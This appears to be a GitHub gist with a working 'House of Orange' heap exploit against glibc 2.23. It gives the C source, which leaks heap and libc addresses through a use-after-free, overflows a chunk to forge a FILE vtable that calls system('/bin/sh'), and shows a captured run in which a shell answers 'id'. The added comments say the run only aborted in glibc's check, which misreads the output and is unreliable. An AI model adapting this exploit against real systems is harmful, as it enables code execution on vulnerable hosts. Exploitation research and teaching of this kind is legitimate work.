@inaz2
Last active December 22, 2017 16:16
$ gcc house_of_orange.c -o house_of_orange
house_of_orange.c: In function ‘main’:
house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */
^
house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
*(void **)(p1+0x80+0x30) = -1;
^
$ ./house_of_orange
[+] allocate p1, p2, p3, p4, p5
[+] free p4 and p2
[+] leak heap addresses
addr_heap = 0x19895f0
addr_p2 = 0x19894b0
[+] free p5
[+] leak libc addresses
arena_top = 0x7ff6c6db0b78
libc_base = 0x7ff6c69ed000
libc_system = 0x7ff6c6a32380
libc_IO_list_all = 0x7ff6c6db1520
[+] abuse p1 overflow
[+] allocate p6
*** Error in `./house_of_orange': malloc(): memory corruption: 0x00007ff6c6db1520 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x77725)[0x7ff6c6a64725]
/lib/x86_64-linux-gnu/libc.so.6(+0x819be)[0x7ff6c6a6e9be]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7ff6c6a705a4]
./house_of_orange[0x400881]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ff6c6a0d830]
./house_of_orange[0x400599]
======= Memory map: ========
00400000-00401000 r-xp 00000000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange
00600000-00601000 r--p 00000000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange
00601000-00602000 rw-p 00001000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange
01989000-019aa000 rw-p 00000000 00:00 0 [heap]
7ff6c0000000-7ff6c0021000 rw-p 00000000 00:00 0
7ff6c0021000-7ff6c4000000 ---p 00000000 00:00 0
7ff6c67d7000-7ff6c67ed000 r-xp 00000000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ff6c67ed000-7ff6c69ec000 ---p 00016000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ff6c69ec000-7ff6c69ed000 rw-p 00015000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1
7ff6c69ed000-7ff6c6bad000 r-xp 00000000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so
7ff6c6bad000-7ff6c6dac000 ---p 001c0000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so
7ff6c6dac000-7ff6c6db0000 r--p 001bf000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so
7ff6c6db0000-7ff6c6db2000 rw-p 001c3000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so
7ff6c6db2000-7ff6c6db6000 rw-p 00000000 00:00 0
7ff6c6db6000-7ff6c6ddc000 r-xp 00000000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so
7ff6c6fcc000-7ff6c6fcf000 rw-p 00000000 00:00 0
7ff6c6fd8000-7ff6c6fdb000 rw-p 00000000 00:00 0
7ff6c6fdb000-7ff6c6fdc000 r--p 00025000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so
7ff6c6fdc000-7ff6c6fdd000 rw-p 00026000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so
7ff6c6fdd000-7ff6c6fde000 rw-p 00000000 00:00 0
7ffd8137a000-7ffd8139b000 rw-p 00000000 00:00 0 [stack]
7ffd813e3000-7ffd813e5000 r--p 00000000 00:00 0 [vvar]
7ffd813e5000-7ffd813e7000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
$
Aborted (core dumped)
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.3.1 20160413.
Available extensions:
crypt add-on version 2.1 by Michael Glad and others
GNU Libidn by Simon Josefsson
Native POSIX Threads Library by Ulrich Drepper et al
BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Proof-of-concept from the gist: a deliberate heap overflow out of the
 * 0x80-byte buffer p1 into the chunk that follows it, aimed at the glibc
 * 2.23 build whose version banner appears in the captured output above.
 * Every numeric offset below is hard-coded for that exact build and heap
 * layout; on any other libc the arithmetic lands somewhere else.
 *
 * Outcome on this page: the captured run ends in
 * "malloc(): memory corruption" — glibc's own metadata checks inside
 * malloc() detected the tampered chunk at the final allocation and aborted
 * the process. From a defensive angle, the out-of-bounds stores past
 * p1+0x80 are the underlying bug; a bounds-checking allocator or
 * AddressSanitizer would report them at the first write, and the two
 * "assignment makes pointer from integer" warnings gcc printed for this
 * file point at the same lines.
 *
 * Returns 0 if the final malloc() returns normally (it did not in the run
 * shown). Note that the code reads freed memory (p2 after free(p2)) and
 * writes outside an allocation, both undefined behaviour by the standard.
 */
int main()
{
    puts("[+] allocate p1, p2, p3, p4, p5");
    /* Five adjacent chunks of increasing size; the later steps depend on
     * this exact ordering and on no other allocation happening in between. */
    char *p1 = malloc(0x80);
    char *p2 = malloc(0x90);
    char *p3 = malloc(0xa0);
    char *p4 = malloc(0xb0);
    char *p5 = malloc(0xc0);
    puts("\n[+] free p4 and p2");
    free(p4);
    free(p2);
    puts("\n[+] leak heap addresses");
    /* Use-after-free read: the first 8 bytes of the freed p2 now hold an
     * allocator free-list link (per the gist's naming) rather than user
     * data. This is the heap-address disclosure the banner announces. */
    char *addr_heap = *(void **)p2;
    /* 0x140 is a layout-specific distance; not derivable from this file alone. */
    char *addr_p2 = addr_heap - 0x140;
    printf("addr_heap = %p\n", addr_heap);
    printf("addr_p2 = %p\n", addr_p2);
    puts("\n[+] free p5");
    free(p5);
    puts("\n[+] leak libc addresses");
    /* After free(p5) the same slot in p2 is read again and treated as a
     * pointer into libc's main arena (variable name); the three constants
     * below are offsets valid only for libc-2.23 as built for the Ubuntu
     * package listed in the output (see the version banner above). */
    char *arena_top = *(void **)p2;
    char *libc_base = arena_top - 0x3c3b78;
    char *libc_system = libc_base + 0x45380;
    char *libc_IO_list_all = libc_base + 0x3c4520;
    printf("arena_top = %p\n", arena_top);
    printf("libc_base = %p\n", libc_base);
    printf("libc_system = %p\n", libc_system);
    printf("libc_IO_list_all = %p\n", libc_IO_list_all);
    puts("\n[+] abuse p1 overflow");
    /* Everything from here to the next puts() writes past the 0x80 bytes
     * requested for p1 — the heap overflow itself. In a real program this
     * is the defect to fix (missing bounds check); here it is simulated
     * directly. The two integer-to-pointer stores (0x61 and -1) are what
     * gcc's -Wint-conversion warnings in the page output refer to. */
    memcpy(p1+0x80, "/bin/sh\x00", 8); /* first arg of __overflow() */
    *(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */
    *(void **)(p1+0x80+0x18) = libc_IO_list_all-0x10; /* unsorted bin attack */
    *(void **)(p1+0x80+0x28) = libc_system; /* vtable->__overflow */
    *(void **)(p1+0x80+0x30) = -1;
    *(void **)(p1+0x80+0xa0) = addr_p2; /* _chain->vtable */
    *(void **)(p1+0x80+0xd8) = addr_p2; /* _IO_list_all->file->_chain */
    puts("\n[+] allocate p6");
    /* The allocation that walks the corrupted free lists. In the captured
     * run glibc's consistency check fired here and the process aborted
     * ("malloc(): memory corruption" in the output above). p6 is never used. */
    char *p6 = malloc(0xd0);
    return 0;
}